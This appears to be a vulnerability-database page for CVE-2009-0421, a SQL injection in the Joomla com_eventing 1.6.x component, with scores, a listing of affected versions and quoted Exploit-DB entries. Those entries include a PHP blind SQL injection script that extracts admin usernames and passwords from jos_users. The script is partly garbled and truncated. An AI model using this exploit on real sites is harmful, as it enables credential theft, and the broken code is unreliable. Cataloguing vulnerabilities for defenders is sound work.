CVE-2009-0421
published 2009-02-05CVE-2009-0421: SQL injection vulnerability in the Eventing (com_eventing) 1.6.x component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.04%
78.8th percentile
SQL injection vulnerability in the Eventing (com_eventing) 1.6.x component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter to index.php.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_eventing | — | — |
| joomla | com_eventing | — | — |
| joomla | com_eventing | — | — |
| joomla | com_eventing | — | — |
| joomla | com_eventing | — | — |
| joomla | com_eventing | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
boxalino 09.05.25-0421 - Directory Traversal
exploitdb·2009-10-20·CVSS 7.5
CVE-2009-1479 [HIGH] boxalino 09.05.25-0421 - Directory Traversal
boxalino 09.05.25-0421 - Directory Traversal
---
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Boxalino
# Vendor: Boxalino AG (www.boxalino.com)
# CVD ID: CVE-2009-1479
# Subject: Directory Traversal Vulnerabilities
# Risk: High
# Effect: Remotely exploitable
# Author: Axel Neumann
# Date: 2009-10-20
#
#############################################################
Introduction
An Directory Traversal vulnerability exists in the collaboration
platform Boxalino [1]. Remote exploitation of a directory traversal
vulnerability in Boxalino's product allows attackers to read arbitrary
files on the server file system with web
Exploit-DB
Joomla! Component com_Eventing 1.6.x - Blind SQL Injection
exploitdb·2009-01-15
CVE-2009-0421 Joomla! Component com_Eventing 1.6.x - Blind SQL Injection
Joomla! Component com_Eventing 1.6.x - Blind SQL Injection
---
1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i
http://secunia.com/advisories/33563http://www.securityfocus.com/bid/33296https://exchange.xforce.ibmcloud.com/vulnerabilities/48016https://www.exploit-db.com/exploits/7793http://secunia.com/advisories/33563http://www.securityfocus.com/bid/33296https://exchange.xforce.ibmcloud.com/vulnerabilities/48016https://www.exploit-db.com/exploits/7793
2009-02-05
Published